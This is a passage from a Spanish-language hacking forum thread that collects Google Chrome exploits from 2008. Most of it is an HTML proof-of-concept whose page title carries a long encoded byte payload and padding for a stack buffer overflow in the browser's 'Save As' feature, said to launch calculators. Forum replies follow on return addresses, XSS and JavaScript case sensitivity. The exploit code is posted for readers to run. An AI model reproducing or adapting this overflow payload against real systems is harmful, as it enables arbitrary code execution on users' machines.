&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#62503;&#29897;&#37008;&#60166;&#2827;)&#37008;&#37008;&#37008;&#37008;&#37008;&#37008;&#37008;&#37008;&#51505;&#59779;&#9332;&#23540;&#29569;&#60435;&#13869;&#33630;&#64747;&#62690;&#50448;&#24178;&#11756;&#7101;&#42704;&#23370;&#11412;&#54745;&#13731;&#445;&#11468;&#6109;&#6503;&#24509;&#7170;&#51190;&#43328;&#10998;&#60651;&#21500;&#61421;&#43741;&#31191;&#23058;&#51353;&#445;&#11464;&#14557;&#8551;&#54653;&#12723;&#46391;&#12647;&#24509;&#41991;&#31338;&#61160;&#40455;&#42632;&#28278;&#60777;&#21070;&#28007;&#54586;&#12700;&#54683;&#9604;&#22493;&#44391;&#24198;&#11756;&#14013;&#29392;&#43015;&#31628;&#42687;&#60783;&#3661;&#23228;&#17843;&#41134;&#9062;&#41313;&#19979;&#12887;&#11663;&#24118;AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
</title>
</head>
<body>
Click 'Save As' function for checking this vulnerability.
Note: Opening multiple Calculators.
 
</body>
</html>

Fuentes:
http://seclists.org/bugtraq/2008/Sep/0070.html
http://security.bkis.vn/Proof-Of-Concept/PoC-XPSP2.html
http://milw0rm.com/exploits/6367
En línea


Trancek

Desconectado Desconectado

Mensajes: 29


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #28 en: 6 Septiembre 2008, 15:33 »

berz3k es un stack-based buffer overflow, asi que usara algun Return Address que no este en tu sistema windows lo mas probable y por ello a lo mejor no te funcionara, digo yo..porque hay varias PoC, yo es que pase de bajarme todavia el Chrome, estoy agusto con firefox
En línea

sirdarckcat
Troll Buena Onda y
CoAdmin
***
Desconectado Desconectado

Mensajes: 6.946


Lavando Platos


Ver Perfil WWW
Re: Recopilatorio de Bugs/Exploits en Google Chrome win32
« Respuesta #29 en: 6 Septiembre 2008, 21:52 »

Citar
javascript:Alert("test");
Citar
javascript:alert("test");
Ojo porque Google Chrome diferencia entre mayusculas y minusculas al momento de ejecutar javascript causando una grán incompatibilidad con algunos sitios webs que por costumbre inician la primera letra de sus funciones con mayusculas entre varios otros, pero no así en la declaración de la utilización de scripts:
Citar
javascript:alert("test");
Haciendo que sea incompatible para el buén funcionamiento y accesible para ataques de tipo XSS con escapes de case sensitive.


Talves esto sea la principal razón de la incompatibilidad con algunos sitios webs.
Falso
prueba poniendo Alert(123) en firefox ;)

De lo del BoF, pues que cagado jajaja.. aunque si funciona tengo screenshots :¬¬ jaja

Saludos!!
En línea

Páginas: 1 [2] 3 4 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
2 Google Bugs XSS&Redirect with using bit.ly (video)
Nivel Web
sony1a2 8 2,133 Último mensaje 4 Enero 2011, 22:26
por berz3k
Powered by SMF 1.1.16 | SMF © 2006-2008, Simple Machines